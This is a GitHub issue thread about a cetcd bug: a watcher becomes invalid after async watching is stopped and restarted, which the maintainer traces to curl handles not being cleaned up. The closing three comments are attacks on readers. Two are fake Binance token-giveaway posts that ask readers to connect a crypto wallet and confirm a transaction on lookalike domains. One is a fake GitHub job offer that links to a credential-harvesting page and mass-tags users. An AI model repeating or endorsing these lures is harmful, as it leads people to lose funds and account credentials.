### ISSUE TITLE
stop async watch, add new watcher and restart, the watcher is invalid

### ISSUE THREAD

**Issue by xiaoyulei** [shafreeck/cetcd#33]
the example code is like this below. I add a watcher and start async watch. Then stop it, add another watcher and start it again. I found that only the second watcher can receive watch event, the first is invalid.

```
cetcd_client m_cli;
cetcd_array m_addrs;
cetcd_array m_watchers;

cetcd_client_init(&m_cli, &m_addrs);
cetcd_array_init(&m_watchers, 1);
cetcd_watcher* watcher = cetcd_watcher_create(&m_cli, getKey1(), 0, 1 , 0, handleEvent1, NULL);
cetcd_add_watcher(&m_watchers, watcher);
cetcd_multi_watch_async(&m_cli, &m_watchers);
cetcd_multi_watch_async_stop(&m_cli, m_wid);

cetcd_watcher* watcher = cetcd_watcher_create(&m_cli, getKey2(), 0, 1 , 0, handleEvent2, NULL);
cetcd_add_watcher(&m_watchers, watcher);
cetcd_multi_watch_async(&m_cli, &m_watchers);
```

**Comment by xiaoyulei** [comment]
@shafreeck @Huang-lin

**Comment by shafreeck** [comment]
There is some problem with your code above

##### First

> cetcd_watcher\* watcher = cetcd_watcher_create(&m_cli, getKey1(), 0, 1 , 0, handleEvent1, NULL);
> cetcd_multi_watch_async(&m_cli, &m_watchers);

The `watcher` should be add to m_watchers first using `cetcd_add_watcher`

##### Second

> cetcd_watcher\* watcher = cetcd_watcher_create(&m_cli, getKey2(), 0, 1 , 0, handleEvent2, NULL);
> cetcd_multi_watch_async(&m_cli, &m_watchers);

This is the same as above case, add it before watching.

##### Finally

You may have added the watcher in you real code. The answer to your question is that it is a feature not a bug.

All watchers will be recycled when stop watching, so you can not use it later. We can not support adding watcher dynamic when watching has started. This is really a limitation. You can work around this using your code above with tiny fixes.

The fix is that you do not have to stop the previous watching thread before issuing another. You could create a new array and add the watchers that you created, then call `cetcd_multi_watch_async` and save the `wid` it returned.  Stop all the `wid`s when you really don't need them.

**Comment by xiaoyulei** [comment]
@shafreeck sorry, I lost one line `cetcd_add_watcher(&m_watchers, watcher);`, but in my real code it exist, I have update it.

**Comment by xiaoyulei** [comment]
If I do like this, it will generate a new thread. I want use one thread to manager all the watchers.

```
The fix is that you do not have to stop the previous watching thread before issuing another. You could create a new array and add the watchers that you created, then call cetcd_multi_watch_async and save the wid it returned. Stop all the wids when you really don't need them.
```

**Comment by xiaoyulei** [comment]
In `cetcd_multi_watch_async_stop`, I see the code just stop thread, not recycle watchers.

**Comment by shafreeck** [comment]
@YuleiXiao 

> In cetcd_multi_watch_async_stop, I see the code just stop thread, not recycle watchers.

Yes, you are right, sorry I made a mistake. However,  `cetcd_multi_watch_async_stop` may cause some memory leaks in your case. It is recommended to use only when process going to exit. 

I'll try to debug about your issue, thanks for feedback.

**Comment by shafreeck** [comment]
@YuleiXiao 
I did some test and found that it is because the watcher's curl handler has been added to mcurl in `curl_multi_watch`

``` c
for (i = 0; i < count; ++i) {
         watcher = cetcd_array_get(watchers, i);
         curl_easy_setopt(watcher->curl, CURLOPT_PRIVATE, watcher);
         curl_multi_add_handle(mcurl, watcher->curl);
}
```

I think this may cause some inconsistent of `watcher->curl`'s state when forcing to cancel the thread without removing it first.

I don't have any good ideas about this so far, maybe we should use `pthread_cleanup_pop` to do some cleanup.

**Comment by xiaoyulei** [comment]
@shafreeck I think you are right. we should cleanup curl before next used.

**Comment by xcluz-git** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![https://www.bnbrewards.online/?source=github](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

**Comment by jorarportal** [comment]
# Binance

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

[![Claim Now](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)](http://go.bnbcoinsearn.online/97Q7Yj)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](http://go.bnbcoinsearn.online/97Q7Yj).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=http://go.bnbcoinsearn.online/97Q7Yj&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

**Comment by pavana21** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
JanessaTech, @choestelus, @miles990, @starkriedesel, @mnamesujit, @Mcdukha, @csuito, @diwata2021, @cchighman, @refcell, @fhools, @r44cx, @SautPutra, @fuxingloh, @felipecsl, @akannke, @decanus, @nmakhotkin, @hidaloop, @Astrapolis-peasant
